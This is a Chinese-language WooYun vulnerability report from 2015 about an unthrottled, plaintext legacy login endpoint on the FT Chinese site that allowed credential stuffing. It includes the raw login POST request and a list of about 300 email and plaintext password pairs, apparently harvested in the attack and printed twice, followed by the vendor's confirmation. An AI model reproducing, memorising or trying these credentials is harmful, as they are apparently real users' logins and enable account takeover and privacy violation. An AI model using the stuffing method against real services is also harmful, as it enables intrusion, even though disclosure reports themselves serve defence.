FT中文网主站接口设计不当可导致撞库攻击（严重泄漏用户敏感信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144140

漏洞标题： FT中文网主站接口设计不当可导致撞库攻击（严重泄漏用户敏感信息）

漏洞作者：路人甲

提交时间：2015-09-29 22:10

修复时间：2015-11-09 10:55

公开时间：2015-11-09 10:55

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：3

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-29：细节已通知厂商并且等待厂商处理中
2015-09-30：厂商已经确认，细节仅向厂商公开
2015-10-10：细节向核心白帽子及相关领域专家公开
2015-10-20：细节向普通白帽子公开
2015-10-30：细节向实习白帽子公开
2015-11-09：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

FT中文网主站接口设计不当可导致撞库攻击（严重泄漏用户敏感信息）

详细说明：

FT中文网主站登陆接口：http://user.ftchinese.com/login
因为登陆位置没有做出任何登陆限制，抓包查看用户名和密码又是明文传输，所以可以导致撞库攻击：

POST /login HTTP/1.1
Host: user.ftchinese.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://user.ftchinese.com/login
Cookie: _ga=GA1.3.214002032.1443503033; gourl=http%3A%2F%2Fwww.ftchinese.com%2F; PHPSESSID=u812ipbdb5e0s78dv4o6nt2gj3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
username=123123123@qq%2ecom&password=123123&saveme=on&gourl=http%3A%2F%2Fuser.ftchinese.com%2Flogin

179139194@qq.com	188571	971
376461781@qq.com	6025210	974
yetaosteven@vip.qq.com	102734	975
huxiaoming@vip.qq.com	1982529	976
513044644@qq.com	7618978	976
111111@qq.com	111111	977
qq@qq.com	123456	978
32689852@qq.com	32689852	978
71199676@qq.com	851024	978
171217228@qq.com	mikeisgood	979
awangsky@qq.com	skymaster	979
qq@qq.com	123456	980
1069426829@qq.com	51877018	981
lionfoo@qq.com	19840716	982
529877392@qq.com	15968707181	982
qq@qq.com	123456	982
448009816@qq.com	870923	993
751832831@qq.com	i4e4x5a3	994
496970884@qq.com	zhuxuanans	994
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	997
123456789@qq.com	123456	997
20958093@qq.com	b299782t	997
852404509@qq.com	852404509	1007
balalalove@qq.com	wsawsdws	1008
351460702@qq.com	963277	1010
191597445@qq.com	1307636720	1010
39329359@qq.com	6223568	1012
114791976@qq.com	yuanye	1012
10939907@qq.com	454563	1013
95355293@qq.com	123456	1013
hehe767@qq.com	54088d11	1013
82453792@qq.com	lefthand	1014
joylz@qq.com	3624029	1014
491599687@qq.com	dxb222	1015
99265839@qq.com	99265839	1016
bingyinyue@vip.qq.com	c1991718	1017
jscspxf@qq.com	52501995	1019
lfzf76@vip.qq.com	zxkzxk	1020
76325385@qq.com	321610	1023
132@qq.com	123456	1025
12345@qq.com	123456	1025
804749235@qq.com	636209166	1025
asiana007@qq.com	password	1026
295430726@qq.com	4210026a	1026
827990991@qq.com	zhendeaini	1026
835477487@qq.com	880526	1026
317334875@qq.com	55326961	1027
616081329@qq.com	881019	1027
ynzhh@qq.com	950902	1027
wd_zhang@qq.com	cmbjx1995	1027
123123123@qq.com	123123	1028
381410341@qq.com	a3540338	1028
595729935@qq.com	mayang	1029
wanqi319@vip.qq.com	27057663	1029
9017614@qq.com	19621021	1029
znpaladin@qq.com	4369297	1030
123123123@qq.com	123123	1030
357303660@qq.com	5zmqamjg	1030
195391786@qq.com	19911013	1030
123123123@qq.com	123123	1030
40491228@qq.com	snoopylmh	1030
24381257@qq.com	86015949	1030
384644509@qq.com	3381445	1031
123123123@qq.com	123123	1032
812033254@qq.com	7660213	1032
11111@qq.com	111111	1032
11111@qq.com	111111	1032
11111@qq.com	111111	1032
514711124@qq.com	85190453	1032
123123123@qq.com	123123	1032
443584130@qq.com	static	1032
190424933@qq.com	131421	1032
714447@qq.com	123456	1032
812033254@qq.com	7660213	1032
c.junpeng@qq.com	3653350	1032
22930748@qq.com	mfkcatq	1033
260204179@qq.com	tw123456789	1034
11111@qq.com	111111	1034
www.123456@qq.com	123456	1034
563279458@qq.com	900218	1034
wyg1258@qq.com	w5722u	1034
365704502@qq.com	880714	1034
406033213@qq.com	8846887	1034
78407976@qq.com	521665	1034
350958532@qq.com	350958532	1034
452913373@qq.com	1990920	1034
799135072@qq.com	bailou199012	1035
11111@qq.com	111111	1036
sunking47102@qq.com	77478012	1036
605014739@qq.com	0.123654	1036
z248890906@qq.com	123321	1036
519598030@qq.com	9203317115	1036
619554838@qq.com	5201314	1036
123123123@qq.com	123123	1036
496108697@qq.com	woaini1122	1036
372253332@qq.com	7319098	1036
398736838@qq.com	880807	1036
672087110@qq.com	132921088	1036
53146204@qq.com	27463722	1036
supervip@qq.com	23230078	1037
sz_asong@qq.com	sarah526	1037
58055612@qq.com	72160317	1038
395885205@qq.com	123456	1039
34379332@qq.com	19732846	1041
68201085@qq.com	wenjie143	1043
antyang@qq.com	110110	1046
290397579@qq.com	6322098	1046
lynn_jessie_jc@qq.com	139a1300	1049
417805449@qq.com	8703631	1049
114599582@qq.com	8267638	1057
communion@vip.qq.com	789456	1061
870423301@qq.com	870423	1061
860991025@qq.com	zxzl19860428	1065
469056324@qq.com	wuya0751	1067
346562859@qq.com	123456	1067
win307@vip.qq.com	422307	1069
262242944@qq.com	871128	1069
123123@qq.com	123456	1071
34920943@qq.com	woaini	1072
23592766@qq.com	123456	1072
rshry@qq.com	111111	1072
176862272@qq.com	984331	1072
240803358@qq.com	cx7773046	1072
cash0167@qq.com	1314521ding	1073
522052105@qq.com	63476369	1073
330765548@qq.com	100200	1073
bb14cn@qq.com	456852	1073
jian90@qq.com	19900420	1073
jsz2@qq.com	8777557	1073
26323251@qq.com	woainiya	1074
740716459@qq.com	wlc123	1074
chew_l@qq.com	335544	1074
aisini168@qq.com	nwcpadme	1074
251932360@qq.com	123456	1074
zhuwen888888@qq.com	3951435	1074
sconiel@qq.com	sconiel	1074
403056713@qq.com	duandian	1074
chinasaly@qq.com	stamina	1074
157460135@qq.com	123456a	1074
978316137@qq.com	321654	1075
fengtao71@qq.com	fengtao71	1075
52648274@qq.com	811121	1075
46346@qq.com	123456	1075
xy0822@qq.com	13949825568	1075
19760119@qq.com	jeremyok	1075
75157585@qq.com	854111	1076
18404129@qq.com	shenjun	1076
595429278@qq.com	22336495	1077
8252947@qq.com	963852	1077
56094256@qq.com	56094256	1077
181153112@qq.com	88aa88aa88	1077
lixiangdong@vip.qq.com	13895772542	1078
15496439@qq.com	3105955	1078
andyvin@qq.com	yanjingwen	1078
446026301@qq.com	xy19880518	1078
tsxx157@qq.com	775600	1078
383879219@qq.com	hgb1991821	1079
287395@qq.com	yh843100	1079
powsky@qq.com	hwlajj	1079
306676297@qq.com	14541454	1080
394606359@qq.com	333333	1080
86262496@qq.com	3628814	1080
lh8810@qq.com	lh8123456	1083
358289077@qq.com	159654	1083
358289077@qq.com	159654	1083
136880431@qq.com	19880208	1087
282436130@qq.com	lovely123304	1088
527758783@qq.com	701022	1088
40938048@qq.com	86653470	1088
406328070@qq.com	516618	1089
258039077@qq.com	200712	1090
305182965@qq.com	305182965	1090
zny5951454@qq.com	zny5951454	1091
252219668@qq.com	8888888	1091
401021363@qq.com	5350199a	1092
530324730@qq.com	jiang871027	1093
350394213@qq.com	1382500	1094
15501760@qq.com	15501760	1094
693358491@qq.com	111111	1094
693358491@qq.com	111111	1094
xinxin_cheng@qq.com	19811114	1096
329789280@qq.com	271828	1096
12641407@qq.com	2687264	1096
358175706@qq.com	haozheng668	1098
zb3p@qq.com	19861024	1103
123456@qq.com	123456	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
510457555@qq.com	19920831	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
376570832@qq.com	19890307	1104
123456@qq.com	123456	1104
382700836@qq.com	philips15a	1107
64121063@qq.com	12051205	1107
33454141@qq.com	8970290	1107
604823976@qq.com	989010	1109
bvip@vip.qq.com	wodwodwod	1109
295011478@qq.com	yuanyeyy	1109
xjpcl@qq.com	123456	1110
daylay@qq.com	daylay	1111
523520977@qq.com	iloveyou	1111
379886571@qq.com	379886571	1111
gqxxxx@qq.com	771229	1111
111@qq.com	111	1111
mswwj@qq.com	610428	1112
303139058@qq.com	901013	1113
29680719@qq.com	920305	1113
181059886@qq.com	1456721737	1113
raink@vip.qq.com	19870103	1114
396442210@qq.com	fb18288	1114
119587800@qq.com	88888888	1115
63363523@qq.com	sy3312876	1117
99597219@qq.com	badmescal	1121
412396784@qq.com	8228216	1121
593930281@qq.com	19911215zlt	1123
120028157@qq.com	64221272	1123
wayas01@qq.com	198622700	1124
4842144@qq.com	50427344	1124
4806168@qq.com	31881699	1124
315338650@qq.com	mzl132612	1125
bill_koa@qq.com	830111	1125
550535019@qq.com	15009908417	1125
354149028@qq.com	liyue123456	1125
156839741@qq.com	wrdwhdrdm	1125
hpjack@qq.com	860411	1125
524373648@qq.com	123456	1126
525985621@qq.com	110140	1126
279764086@qq.com	wh16435287	1126
474678472@qq.com	4815887	1126
260983377@qq.com	50199763	1126
llxiang@vip.qq.com	24486229	1126
dicky6666@qq.com	123456789	1126
287743198@qq.com	185961234	1127
584421048@qq.com	584421048	1127
43375976@qq.com	674959	1127
444613513@qq.com	quickbasic	1127
173898076@qq.com	5201314	1127
263465395@qq.com	275071874	1128
459153915@qq.com	8510099	1128
544982175@qq.com	198812zx	1128
camelyx@qq.com	900310	1128
181670415@qq.com	1986092	1128
47414266@qq.com	fimergo	1128
123653139@qq.com	3588706	1128
344306989@qq.com	33775323	1128
zolf110@vip.qq.com	5167998	1128
532902686@qq.com	65189180	1129
949774558@qq.com	123456	1129
23286801@qq.com	qwe123qwe123	1129
602965850@qq.com	fancy639	1129
tinsky998@vip.qq.com	haitian1983	1130
80213265@qq.com	2007310	1130
80111234@qq.com	heartless	1130
whatme321@qq.com	887900	1131
530431914@qq.com	890623	1131
251533446@qq.com	441700	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
531318297@qq.com	ck7812396	1131
251533446@qq.com	441700	1131
175170285@qq.com	12332145	1132
228864554@qq.com	753951	1132
782303589@qq.com	xiaojienb	1132
wangk216@qq.com	111111	1132
1003605476@qq.com	15959208478	1132
343152586@qq.com	gwf870716	1132
bingbing4321@vip.qq.com	632177788	1132
503698837@qq.com	shengxia	1133
276660635@qq.com	cmsj1989	1133
724389764@qq.com	839200	1133
39061910@qq.com	iloveyou	1133
54952877@qq.com	54952877	1133
376586131@qq.com	986753421	1133
291599063@qq.com	zyj543210	1133
291599063@qq.com	zyj543210	1133
maswen@qq.com	eyesonme	1133
125656324@qq.com	as1991520	1134
412787663@qq.com	daviddai1992	1134
350134350@qq.com	2124869	1134
164557345@qq.com	mx2033603	1134
838700580@qq.com	momo5225	1134
401744647@qq.com	8961183	1134
734222938@qq.com	shukuang	1134
229687444@qq.com	13602359761	1135
b2411@qq.com	22441111	1135
545695412@qq.com	changchun	1135
wenwen62@vip.qq.com	9831102	1136
wangxiao122@qq.com	7800459	1136
417676635@qq.com	19931022anne	1136
7287646@qq.com	780612	1136
419301603@qq.com	2663232	1136
503697818@qq.com	503697818	1136
cbwb602@qq.com	415230	1136
345128192@qq.com	yy211314	1137
344210176@qq.com	262053178	1138
341492528@qq.com	2287324	1138
617154937@qq.com	69221462	1138
y2659@vip.qq.com	265900	1138
393391282@qq.com	555555	1138
267198584@qq.com	3503556	1138
252689587@qq.com	86618240	1140
57612290@qq.com	qq123456	1140
651962232@qq.com	2008211043	1142
408335784@qq.com	408335784	1144
303830409@qq.com	199132	1146
635468483@qq.com	nakashima7	1148
310381510@qq.com	li19891220	1150
23785563@qq.com	820523	1152
Mattus@vip.qq.com	7221213	1157
312105329@qq.com	312105329	1157
3249182@qq.com

	19850615	1158
408323738@qq.com	bpf815925	1159
49671151@qq.com	13630850885	1159
18667186@qq.com	kissme	1192

登陆后发现严重泄漏用户敏感信息：

漏洞证明：

FT中文网主站登陆接口：http://user.ftchinese.com/login
因为登陆位置没有做出任何登陆限制，抓包查看用户名和密码又是明文传输，所以可以导致撞库攻击：

POST /login HTTP/1.1
Host: user.ftchinese.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://user.ftchinese.com/login
Cookie: _ga=GA1.3.214002032.1443503033; gourl=http%3A%2F%2Fwww.ftchinese.com%2F; PHPSESSID=u812ipbdb5e0s78dv4o6nt2gj3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
username=123123123@qq%2ecom&password=123123&saveme=on&gourl=http%3A%2F%2Fuser.ftchinese.com%2Flogin

179139194@qq.com	188571	971
376461781@qq.com	6025210	974
yetaosteven@vip.qq.com	102734	975
huxiaoming@vip.qq.com	1982529	976
513044644@qq.com	7618978	976
111111@qq.com	111111	977
qq@qq.com	123456	978
32689852@qq.com	32689852	978
71199676@qq.com	851024	978
171217228@qq.com	mikeisgood	979
awangsky@qq.com	skymaster	979
qq@qq.com	123456	980
1069426829@qq.com	51877018	981
lionfoo@qq.com	19840716	982
529877392@qq.com	15968707181	982
qq@qq.com	123456	982
448009816@qq.com	870923	993
751832831@qq.com	i4e4x5a3	994
496970884@qq.com	zhuxuanans	994
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	995
123456789@qq.com	123456	997
123456789@qq.com	123456	997
20958093@qq.com	b299782t	997
852404509@qq.com	852404509	1007
balalalove@qq.com	wsawsdws	1008
351460702@qq.com	963277	1010
191597445@qq.com	1307636720	1010
39329359@qq.com	6223568	1012
114791976@qq.com	yuanye	1012
10939907@qq.com	454563	1013
95355293@qq.com	123456	1013
hehe767@qq.com	54088d11	1013
82453792@qq.com	lefthand	1014
joylz@qq.com	3624029	1014
491599687@qq.com	dxb222	1015
99265839@qq.com	99265839	1016
bingyinyue@vip.qq.com	c1991718	1017
jscspxf@qq.com	52501995	1019
lfzf76@vip.qq.com	zxkzxk	1020
76325385@qq.com	321610	1023
132@qq.com	123456	1025
12345@qq.com	123456	1025
804749235@qq.com	636209166	1025
asiana007@qq.com	password	1026
295430726@qq.com	4210026a	1026
827990991@qq.com	zhendeaini	1026
835477487@qq.com	880526	1026
317334875@qq.com	55326961	1027
616081329@qq.com	881019	1027
ynzhh@qq.com	950902	1027
wd_zhang@qq.com	cmbjx1995	1027
123123123@qq.com	123123	1028
381410341@qq.com	a3540338	1028
595729935@qq.com	mayang	1029
wanqi319@vip.qq.com	27057663	1029
9017614@qq.com	19621021	1029
znpaladin@qq.com	4369297	1030
123123123@qq.com	123123	1030
357303660@qq.com	5zmqamjg	1030
195391786@qq.com	19911013	1030
123123123@qq.com	123123	1030
40491228@qq.com	snoopylmh	1030
24381257@qq.com	86015949	1030
384644509@qq.com	3381445	1031
123123123@qq.com	123123	1032
812033254@qq.com	7660213	1032
11111@qq.com	111111	1032
11111@qq.com	111111	1032
11111@qq.com	111111	1032
514711124@qq.com	85190453	1032
123123123@qq.com	123123	1032
443584130@qq.com	static	1032
190424933@qq.com	131421	1032
714447@qq.com	123456	1032
812033254@qq.com	7660213	1032
c.junpeng@qq.com	3653350	1032
22930748@qq.com	mfkcatq	1033
260204179@qq.com	tw123456789	1034
11111@qq.com	111111	1034
www.123456@qq.com	123456	1034
563279458@qq.com	900218	1034
wyg1258@qq.com	w5722u	1034
365704502@qq.com	880714	1034
406033213@qq.com	8846887	1034
78407976@qq.com	521665	1034
350958532@qq.com	350958532	1034
452913373@qq.com	1990920	1034
799135072@qq.com	bailou199012	1035
11111@qq.com	111111	1036
sunking47102@qq.com	77478012	1036
605014739@qq.com	0.123654	1036
z248890906@qq.com	123321	1036
519598030@qq.com	9203317115	1036
619554838@qq.com	5201314	1036
123123123@qq.com	123123	1036
496108697@qq.com	woaini1122	1036
372253332@qq.com	7319098	1036
398736838@qq.com	880807	1036
672087110@qq.com	132921088	1036
53146204@qq.com	27463722	1036
supervip@qq.com	23230078	1037
sz_asong@qq.com	sarah526	1037
58055612@qq.com	72160317	1038
395885205@qq.com	123456	1039
34379332@qq.com	19732846	1041
68201085@qq.com	wenjie143	1043
antyang@qq.com	110110	1046
290397579@qq.com	6322098	1046
lynn_jessie_jc@qq.com	139a1300	1049
417805449@qq.com	8703631	1049
114599582@qq.com	8267638	1057
communion@vip.qq.com	789456	1061
870423301@qq.com	870423	1061
860991025@qq.com	zxzl19860428	1065
469056324@qq.com	wuya0751	1067
346562859@qq.com	123456	1067
win307@vip.qq.com	422307	1069
262242944@qq.com	871128	1069
123123@qq.com	123456	1071
34920943@qq.com	woaini	1072
23592766@qq.com	123456	1072
rshry@qq.com	111111	1072
176862272@qq.com	984331	1072
240803358@qq.com	cx7773046	1072
cash0167@qq.com	1314521ding	1073
522052105@qq.com	63476369	1073
330765548@qq.com	100200	1073
bb14cn@qq.com	456852	1073
jian90@qq.com	19900420	1073
jsz2@qq.com	8777557	1073
26323251@qq.com	woainiya	1074
740716459@qq.com	wlc123	1074
chew_l@qq.com	335544	1074
aisini168@qq.com	nwcpadme	1074
251932360@qq.com	123456	1074
zhuwen888888@qq.com	3951435	1074
sconiel@qq.com	sconiel	1074
403056713@qq.com	duandian	1074
chinasaly@qq.com	stamina	1074
157460135@qq.com	123456a	1074
978316137@qq.com	321654	1075
fengtao71@qq.com	fengtao71	1075
52648274@qq.com	811121	1075
46346@qq.com	123456	1075
xy0822@qq.com	13949825568	1075
19760119@qq.com	jeremyok	1075
75157585@qq.com	854111	1076
18404129@qq.com	shenjun	1076
595429278@qq.com	22336495	1077
8252947@qq.com	963852	1077
56094256@qq.com	56094256	1077
181153112@qq.com	88aa88aa88	1077
lixiangdong@vip.qq.com	13895772542	1078
15496439@qq.com	3105955	1078
andyvin@qq.com	yanjingwen	1078
446026301@qq.com	xy19880518	1078
tsxx157@qq.com	775600	1078
383879219@qq.com	hgb1991821	1079
287395@qq.com	yh843100	1079
powsky@qq.com	hwlajj	1079
306676297@qq.com	14541454	1080
394606359@qq.com	333333	1080
86262496@qq.com	3628814	1080
lh8810@qq.com	lh8123456	1083
358289077@qq.com	159654	1083
358289077@qq.com	159654	1083
136880431@qq.com	19880208	1087
282436130@qq.com	lovely123304	1088
527758783@qq.com	701022	1088
40938048@qq.com	86653470	1088
406328070@qq.com	516618	1089
258039077@qq.com	200712	1090
305182965@qq.com	305182965	1090
zny5951454@qq.com	zny5951454	1091
252219668@qq.com	8888888	1091
401021363@qq.com	5350199a	1092
530324730@qq.com	jiang871027	1093
350394213@qq.com	1382500	1094
15501760@qq.com	15501760	1094
693358491@qq.com	111111	1094
693358491@qq.com	111111	1094
xinxin_cheng@qq.com	19811114	1096
329789280@qq.com	271828	1096
12641407@qq.com	2687264	1096
358175706@qq.com	haozheng668	1098
zb3p@qq.com	19861024	1103
123456@qq.com	123456	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
510457555@qq.com	19920831	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
123456@qq.com	123456	1104
376570832@qq.com	19890307	1104
123456@qq.com	123456	1104
382700836@qq.com	philips15a	1107
64121063@qq.com	12051205	1107
33454141@qq.com	8970290	1107
604823976@qq.com	989010	1109
bvip@vip.qq.com	wodwodwod	1109
295011478@qq.com	yuanyeyy	1109
xjpcl@qq.com	123456	1110
daylay@qq.com	daylay	1111
523520977@qq.com	iloveyou	1111
379886571@qq.com	379886571	1111
gqxxxx@qq.com	771229	1111
111@qq.com	111	1111
mswwj@qq.com	610428	1112
303139058@qq.com	901013	1113
29680719@qq.com	920305	1113
181059886@qq.com	1456721737	1113
raink@vip.qq.com	19870103	1114
396442210@qq.com	fb18288	1114
119587800@qq.com	88888888	1115
63363523@qq.com	sy3312876	1117
99597219@qq.com	badmescal	1121
412396784@qq.com	8228216	1121
593930281@qq.com	19911215zlt	1123
120028157@qq.com	64221272	1123
wayas01@qq.com	198622700	1124
4842144@qq.com	50427344	1124
4806168@qq.com	31881699	1124
315338650@qq.com	mzl132612	1125
bill_koa@qq.com	830111	1125
550535019@qq.com	15009908417	1125
354149028@qq.com	liyue123456	1125
156839741@qq.com	wrdwhdrdm	1125
hpjack@qq.com	860411	1125
524373648@qq.com	123456	1126
525985621@qq.com	110140	1126
279764086@qq.com	wh16435287	1126
474678472@qq.com	4815887	1126
260983377@qq.com	50199763	1126
llxiang@vip.qq.com	24486229	1126
dicky6666@qq.com	123456789	1126
287743198@qq.com	185961234	1127
584421048@qq.com	584421048	1127
43375976@qq.com	674959	1127
444613513@qq.com	quickbasic	1127
173898076@qq.com	5201314	1127
263465395@qq.com	275071874	1128
459153915@qq.com	8510099	1128
544982175@qq.com	198812zx	1128
camelyx@qq.com	900310	1128
181670415@qq.com	1986092	1128
47414266@qq.com	fimergo	1128
123653139@qq.com	3588706	1128
344306989@qq.com	33775323	1128
zolf110@vip.qq.com	5167998	1128
532902686@qq.com	65189180	1129
949774558@qq.com	123456	1129
23286801@qq.com	qwe123qwe123	1129
602965850@qq.com	fancy639	1129
tinsky998@vip.qq.com	haitian1983	1130
80213265@qq.com	2007310	1130
80111234@qq.com	heartless	1130
whatme321@qq.com	887900	1131
530431914@qq.com	890623	1131
251533446@qq.com	441700	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
291599063@qq.com	zyj543210	1131
531318297@qq.com	ck7812396	1131
251533446@qq.com	441700	1131
175170285@qq.com	12332145	1132
228864554@qq.com	753951	1132
782303589@qq.com	xiaojienb	1132
wangk216@qq.com	111111	1132
1003605476@qq.com	15959208478	1132
343152586@qq.com	gwf870716	1132
bingbing4321@vip.qq.com	632177788	1132
503698837@qq.com	shengxia	1133
276660635@qq.com	cmsj1989	1133
724389764@qq.com	839200	1133
39061910@qq.com	iloveyou	1133
54952877@qq.com	54952877	1133
376586131@qq.com	986753421	1133
291599063@qq.com	zyj543210	1133
291599063@qq.com	zyj543210	1133
maswen@qq.com	eyesonme	1133
125656324@qq.com	as1991520	1134
412787663@qq.com	daviddai1992	1134
350134350@qq.com	2124869	1134
164557345@qq.com	mx2033603	1134
838700580@qq.com	momo5225	1134
401744647@qq.com	8961183	1134
734222938@qq.com	shukuang	1134
229687444@qq.com	13602359761	1135
b2411@qq.com	22441111	1135
545695412@qq.com	changchun	1135
wenwen62@vip.qq.com	9831102	1136
wangxiao122@qq.com	7800459	1136
417676635@qq.com	19931022anne	1136
7287646@qq.com	780612	1136
419301603@qq.com	2663232	1136
503697818@qq.com	503697818	1136
cbwb602@qq.com	415230	1136
345128192@qq.com	yy211314	1137
344210176@qq.com	262053178	1138
341492528@qq.com	2287324	1138
617154937@qq.com	69221462	1138
y2659@vip.qq.com	265900	1138
393391282@qq.com	555555	1138
267198584@qq.com	3503556	1138
252689587@qq.com	86618240	1140
57612290@qq.com	qq123456	1140
651962232@qq.com	2008211043	1142
408335784@qq.com	408335784	1144
303830409@qq.com	199132	1146
635468483@qq.com	nakashima7	1148
310381510@qq.com	li19891220	1150
23785563@qq.com	820523	1152
Mattus@vip.qq.com	7221213	1157
312105329@qq.com	312105329	1157
3249182@qq.com

	19850615	1158
408323738@qq.com	bpf815925	1159
49671151@qq.com	13630850885	1159
18667186@qq.com	kissme	1192

登陆后发现严重泄漏用户敏感信息：

修复方案：

验证码

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-09-30 11:24

厂商回复：

一个旧的登录接口本应该在2013年就作废的，但程序更新过程中没有更新到线上，所以存在一种可能导致这个旧的接口可以被访问到。这个接口的验证机制有漏洞，导致被扫库。非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144140

漏洞标题： FT中文网主站接口设计不当可导致撞库攻击（严重泄漏用户敏感信息）

相关厂商：FT中文网

漏洞作者：路人甲

提交时间：2015-09-29 22:10

修复时间：2015-11-09 10:55

公开时间：2015-11-09 10:55

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：3

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144140

漏洞标题： FT中文网主站接口设计不当可导致撞库攻击（严重泄漏用户敏感信息）

相关厂商：FT中文网

漏洞作者： 路人甲

提交时间：2015-09-29 22:10

修复时间：2015-11-09 10:55

公开时间：2015-11-09 10:55

漏洞类型：设计缺陷/逻辑错误

危害等级：低

自评Rank：3

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144140"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云